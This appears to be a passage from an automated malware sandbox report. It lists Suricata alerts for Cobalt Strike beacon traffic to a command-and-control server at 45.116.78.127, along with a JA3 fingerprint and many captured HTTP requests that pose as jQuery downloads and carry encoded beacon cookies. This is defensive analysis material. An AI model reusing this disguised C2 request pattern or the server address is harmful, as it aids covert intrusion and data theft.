        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49933
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50031 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50031 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50030 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50030 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:49945 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:49945 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50034
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49989
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50020 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50020 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50016
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50031
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50030
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50020
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50021 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50021 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:49945
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50021
        Source: Network trafficSuricata IDS: 2033658 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2 : 192.168.2.5:50011 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033928 - Severity 1 - ET MALWARE Cobalt Strike Beacon Activity (GET) : 192.168.2.5:50011 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 45.116.78.127:443 -> 192.168.2.5:50011
        Source: Malware configuration extractorURLs: 45.116.78.127
        Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49708 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49714 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49706 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49704 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49728 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49705 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49707 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49739 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49755 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49794 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49766 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49782 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49822 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49836 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49849 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49863 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49878 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49890 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49918 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49906 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49933 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49945 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49809 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49989 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50003 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50004 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50005 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50007 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50010 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50017 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50006 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50015 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50012 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50009 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50014 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50008 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50020 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50024 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50016 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50023 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50013 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50026 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50011 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50029 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50030 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50028 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50032 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50019 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50034 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50025 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50021 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50027 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50033 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50018 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50031 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50022 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49962 -> 45.116.78.127:443
        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49978 -> 45.116.78.127:443
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://code.jquery.com/Accept-Encoding: gzip, deflateCookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5IUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoHost: 45.116.78.127Connection: Keep-AliveCache-Control: no-cache
